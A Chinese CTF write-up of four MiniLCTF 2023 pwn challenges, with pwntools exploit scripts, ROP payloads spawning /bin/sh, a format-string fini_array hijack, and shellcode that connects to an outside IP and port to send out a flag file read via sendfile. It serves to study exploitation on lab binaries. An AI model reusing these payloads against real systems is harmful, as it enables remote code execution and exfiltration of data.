2025-05-15

MiniLCTF 2023

前言:

今天无聊时翻田师傅的博客,看到关于2023年的miniLCTF觉得挺有意思的,刚刚好下午没课,就花了一下午+晚上复现
ezbook的多线程竞争暂时看不懂 ~~真的是ez吗我不禁想问~~

靶场链接:靶场

1. “3calls”

1747316030506

check函数是用于检查我们调用的是不是libc函数,在调试时check函数会打开新的线程导致gdb终止,我们可以使用IDA将call check这段nop掉*(关于使用IDA来修改elf文件在我的第一篇iot博客内)*

main函数的核心功能与特点为:

给我们libc的地址
让我们输入三个函数地址
对三个地址中的函数进行调用
调用函数时无法控制函数的参数

我们最后的目的是调用system函数(~~总不可能是orw吧~~),system的参数可以通过IO封装的read函数来实现,这里我选择的是gets函数,因为gets的一参刚刚好就是gets写入的地址,也是system的一参.

通过调试我们可以看到在调用puts的过程中:

0x0000786864e80fd3 in puts () from ./libc.so.6
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────
 RAX  0xa
 RBX  0xa
 RCX  0x786864f14a37 (write+23) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0xffffffff
 RDI  1
 RSI  0x78686501a803 (_IO_2_1_stdout_+131) ◂— 0x1ba70000000000a /* '\n' */
 R8   9
 R9   0x7ffe9792f70c ◂— 0x1500007868 /* 'hx' */
 R10  0
 R11  0x246
 R12  0x5da1a1a31084 ◂— 'good job!'
 R13  0x5da1a1a33020 (stdout@GLIBC_2.2.5) —▸ 0x78686501a780 (_IO_2_1_stdout_) ◂— 0xfbad2887
 R14  0x786865016600 (_IO_file_jumps) ◂— 0
 R15  0x78686515c040 (_rtld_global) —▸ 0x78686515d2e0 —▸ 0x5da1a1a2f000 ◂— 0x10102464c457f
 RBP  0x78686501a780 (_IO_2_1_stdout_) ◂— 0xfbad2887
 RSP  0x7ffe97931960 —▸ 0x78686501a6a0 (_IO_2_1_stderr_) ◂— 0xfbad2087
*RIP  0x786864e80fd3 (puts+259) ◂— mov rdi, qword ptr [rbp + 0x88]
───────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────
   0x786864e80fbe <puts+238>    mov    eax, 0x7fffffff             EAX => 0x7fffffff
   0x786864e80fc3 <puts+243>    cmp    rbx, rax                    0xa - 0x7fffffff     EFLAGS => 0x293 [ CF pf AF zf SF IF df of ]
   0x786864e80fc6 <puts+246>  ✔ cmovbe rax, rbx
   0x786864e80fca <puts+250>    test   dword ptr [rbp], 0x8000     0xfbad2887 & 0x8000     EFLAGS => 0x246 [ cf PF af ZF sf IF df of ]
   0x786864e80fd1 <puts+257>    jne    puts+294                    <puts+294>
 
 ► 0x786864e80fd3 <puts+259>    mov    rdi, qword ptr [rbp + 0x88]     RDI, [_IO_2_1_stdout_+136] => 0x78686501ba70 ◂— 0x100000001
   0x786864e80fda <puts+266>    mov    esi, dword ptr [rdi + 4]        ESI, [0x78686501ba74] => 1
   0x786864e80fdd <puts+269>    lea    edx, [rsi - 1]                  EDX => 0
   0x786864e80fe0 <puts+272>    mov    dword ptr [rdi + 4], edx        [0x78686501ba74] <= 0
   0x786864e80fe3 <puts+275>    test   edx, edx                        0 & 0     EFLAGS => 0x246 [ cf PF af ZF sf IF df of ]
   0x786864e80fe5 <puts+277>    jne    puts+294                    <puts+294>
───────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffe97931960 —▸ 0x78686501a6a0 (_IO_2_1_stderr_) ◂— 0xfbad2087
01:0008│     0x7ffe97931968 —▸ 0x786864e81765 (setvbuf+245) ◂— cmp rax, 1
02:0010│     0x7ffe97931970 ◂— 0
03:0018│     0x7ffe97931978 —▸ 0x7ffe979319d0 ◂— 1
04:0020│     0x7ffe97931980 —▸ 0x7ffe97931ae8 —▸ 0x7ffe97932257 ◂— 0x4853006e77702f2e /* './pwn' */
05:0028│     0x7ffe97931988 —▸ 0x5da1a1a30471 (main) ◂— endbr64 
06:0030│     0x7ffe97931990 —▸ 0x5da1a1a32d70 (__do_global_dtors_aux_fini_array_entry) —▸ 0x5da1a1a30230 (__do_global_dtors_aux) ◂— endbr64 
07:0038│     0x7ffe97931998 —▸ 0x5da1a1a3056d (main+252) ◂— mov dword ptr [rbp - 0x24], 0
───────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────────────────────
 ► 0   0x786864e80fd3 puts+259
   1   0x5da1a1a3056d main+252
   2   0x786864e29d90 None
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

会将rdi赋值为**IO_2_1_stdout+0x88**,在进行IO操作后,就将rdi置零,熟悉IO利用的师傅们能看出来此时的rdi是IO结构体(_IO_2_1_stdout)的lock成员

在IO操作前会对lock域进行上锁操作,IO操作结束后进行解锁操作.所以在puts函数调用结束时rdi会变成*IO_2_1_stdout.lock*的地址!

巧合的是gets函数拥有和puts函数相同的特性,所以gets函数结束后rdi也会变成可写区域,只不过变成了*IO_2_1_stdin.lock*

那接下来的事情就很简单了:

我们调用gets函数,什么都不读入后回车结束,此时rdi被控制为*IO_2_1_stdin.lock*
再次调用gets函数,向*IO_2_1_stdin.lock*处写入cmd
最后一次调用system,达成任意命令执行

需要注意的是最后一次gets进行IO操作结束后会进行解锁操作(具体来说就是将lock域最低字节置零),我们如果使用”/bin/sh”,就要写入**”/bin0sh”**,这样被解锁后cmd=”/bin/sh”,当然如果写入的命令是”sh||”就不需要注意解锁的问题了 :)

2.ezshellcode

1747318412345

1747318813081

1747318430865

1747318632230

1747318490369

这道题的”特色“:

函数符号和flag符号极为相似,非常容易看错😵
在执行shellcode前将寄存器全清空了,还把fd全关了
开了个很难绷的沙箱

建议将函数符号和缓冲区符号rename一下,然后这个沙箱摆明了想要让我们使用socket+connect+sendfile打.(幸好柯✌教会了我内网穿透)

这种特殊的orw需要我们拥有一个公网IP或内网穿透工具,总之要能被连接到

没有open函数,但是仔细观察会发现fd2并没有被close,而是close了两次fd1(如果不修改符号找这个要把眼睛看瞎)

1.恢复栈指针

想要打socket+connect我们需要把一大串公网IP的地址给dump到寄存器里,但是rsp被xor了

所以第一步是恢复rsp

trick:在fs:[0x300]的地方有一个栈地址

所以我们的第一块shellcode

1	mov rsp, fs:[0x300]

此时我们就可以正常使用push,pop命令了

2.创建一个socket

关于socket到底是个什么东西其实我没想的很清楚

目前的理解就是socket会创建一个文件描述符,我们可以和这个文件描述符代表的IO结构进行IO操作

但是仅仅只是调用socket创建的文件描述符是个”空壳子”,它没有任何实质的内容,自然无法进行IO操作

push SYS_socket
pop rax
push AF_INET
pop rdi
push SOCK_STREAM
pop rsi
syscall

此时会返回一个文件描述符

3.使用connect赋予socket意义

connect将socket绑定到一个公网/内网穿透的端口上,此时的文件描述符拥有了进行IO操作的能力

xchg rdi, rax;
mov rax, 0x12d45f2d7c420002
push rax
push SYS_connect /* 0x2a */
pop rax
mov dl, 0x10;
push rsp;pop rsi;
syscall

connect函数的调用是这道题最难的地方(我觉得),connect的原型是int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);

struct seckaddr的基本结构

struct sockaddr
  {
    __SOCKADDR_COMMON (sa_);        /* Common data: address family and length.  */
    char sa_data[14];                /* Address data.  */
  };

我们需要将我们的公网/内网穿透IP,port按一个顺序组合成long int然后push,pop

假设我的IP:port=45.95.212.18:17020

先将每个字段转化为16进制:

1	45 95 212 18 17020 => 2d 5f d4 12 427c

使用小端序存储

1	0x12d45f2d7c42

再在低16字节拼接上sa_family_t字段(我使用的是IPV4,为2)

最后结构体的数据为0x12d45f2d7c420002

4.sendfile

我在上上篇博客分析过这个调用,它十分好用,将read和write结合在了一起

push 4;pop rsi;
xor rdi,rdi;
push 0;mov rdx,rsp;
push 0x50;pop r10;
push 40;pop rax;
syscall

我们只需要将flag的fd发送到socket的fd中,同时监听这个端口nc -lvvp 1234

sendfile调用后我们就可以在监听的窗口看到flag了 :)

1747320747535

twins

1747320938468

怎么看怎么是一道简简单单的ret2libc,但是附件里给了个python脚本

import sys
from subprocess import *

p1 = Popen('./pwn 2>&1',stdin=PIPE, stdout=PIPE, shell=True)
p2 = Popen('./pwn 2>&1',stdin=PIPE, stdout=PIPE, shell=True)

out1 = p1.stdout.readline()
out2 = p2.stdout.readline()
print(out1[:-1].decode(), flush=True)

def interact(proc, line):
    alive = True
    try:
        proc.stdin.write(line)
        proc.stdin.flush()
    except Exception as e:
        alive = False
    return proc.stdout.readline(), alive

a1, a2 = True, True

while a1 and a2:
    line = sys.stdin.buffer.readline()
    out1, a1 = interact(p1, line)
    out2, a2 = interact(p2, line)
    if out1 != out2:
        print("Output conflict!", flush=True)
        print(f'process 1: {out1}', flush=True)
        print(f'process 2: {out2}', flush=True)
        break
    else:
        print(out1[:-1].decode(), flush=True)

居然同时在远程跑了两个二进制文件,而且如果输出结果不一样还会退出

这样一来就不能构造ROP泄露libc了

还记得magic_gagdet吗?可以在不泄露libc的情况下调用任意libc中的函数,记不清楚或不太了解的师傅可以去看我的第一篇博客 :)

from pwn import *
#io=process('./pwn')
io=remote("172.26.144.1",60945)
libc=ELF('./libc-2.31.so')
context.log_level='debug'
magic=0x40115c
cus1=0x40127A
rdi=0x0000000000401283
gets=0x401070
bss=0x404800
offset=0x10000000000000000+libc.sym.system-libc.sym.setvbuf
got=0x404028
payload=b'a'*0x18+p64(cus1)+p64(offset)+p64(got+0x3d)+p64(0)*4+p64(magic)+p64(rdi)+p64(bss)+p64(gets)+p64(rdi)+p64(bss)+p64(0x401084)
io.recvuntil(b"Welcome to 2023 miniL! Let's play a very eazy game! What's your name?\n")
io.sendline(payload)

io.sendline(b"/bin/sh\x00;sh;sh")

io.interactive()

broken_machine

1747321314635

1747321455234

1747321331327

1747321359880

新知识(对我):

signal(11, (__sighandler_t)handler)当捕捉到11(段错误)时会进入handler处理
s = (char *)mmap((void *)0x1000, 0x1000uLL, 7, 34, -1, 0LL)返回的不是0x1000而是0x10000.详情->源码
sprintf造成的格式化字符串漏洞,%{num}$n中num的计算和printf不一样,因为此时fmt是sprintf的第二个参数,所以num的计数应该从rdi开始(printf从rsi开始)
使用pwntools写出来的shellcode是没有\x00的!

先看main函数,向bss段读入0x400字节,然后检查这段数据中是否只有一个以下的个”n”(限制我们只能使用一次格式化字符串),然后进入machine

在0x10000开辟rxw空间后将bss段数据复制到0x10000处(存在\x00截断)

最后开启沙箱,并跳转到0x1000处

我们知道被mmap修改rwx权限的是0x10000,所以此时访问了非法内存,必然触发段错误,调用handle函数(exit(0))

我们的突破点只能是在exit上

在调用exit时会调用_dl_fini,_dl_fini中调用了函数指针，该函数调用部分源码如下

for (i = 0; i < nmaps; ++i)
    {
      struct link_map *l = maps[i];

      if (l->l_init_called)
	{
	  ...省略

	      /* First see whether an array is given.  */
	      if (l->l_info[DT_FINI_ARRAY] != NULL)
		{
		  ElfW(Addr) *array =
		    (ElfW(Addr) *) (l->l_addr
				    + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
		  unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
				    / sizeof (ElfW(Addr)));
		  while (i-- > 0)
		    ((fini_t) array[i]) ();
		}

我们的劫持目标是array,这里放置了函数指针

PIE	l->addr	l->l_info[DT_FINI_ARRAY]->d_un.d_ptr	l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
0	0	&.fini.array	0x8
1	elf.address	&.fini.array	0x8

我们用gdb观察触发格式化字符串时的栈结构

1747322580464

可以看到有_rtld_global和其中的内容,_rtld_global指向了link_map,link_map (-> l_addr),所以我们可以修改l_addr

结合array的计算我们可以发现:我们可以将array从fini_array(0x403D80)向高地址抬,刚刚好bss就处于fini指针的高地址处

也就是说只要计算好l_addr,我们就能调用任意地址的函数(这个函数的地址我们要提前写入bss中)

那既然题目已经为我们在0x10000开辟了rwx,有允许我们向其中写入shellcode,那就把array偏移到bss上被我们写入了p64(0x10000)的地址,`offset=&(bss.0x10000)-fini_array

from pwn import *
io=process('./pwn')
#io=remote("172.26.144.1",49749)
elf=ELF('./pwn')
context.arch='amd64'
def bug():
    gdb.attach(io)
shellcode =shellcraft.push(1)+shellcraft.push(0)*2
shellcode+="push rsp;pop rdx"
shellcode+=shellcraft.pushstr("/flag")
shellcode+=shellcraft.syscall('SYS_openat2', 0, 'rsp', 'rdx', 0x18)#shellcraft.syscall("SYS_openat2",0,'rsp','rdx',0x18)
shellcode+=shellcraft.sendfile(1,3,0,0x50)
payload =asm(shellcode)
num=elf.bss(0x40+ 0x17)-0x403D80
print(hex(num+len(asm(shellcode))))
payload+=f'%{num}c%35$n'.encode().ljust(0x17)
payload+=p64(0x10000)
print(payload)
bug()
io.sendline(payload)
io.interactive()

1747323091069

title: MiniLCTF

date: 2025-5-15 17:49:32

tags: pwn wp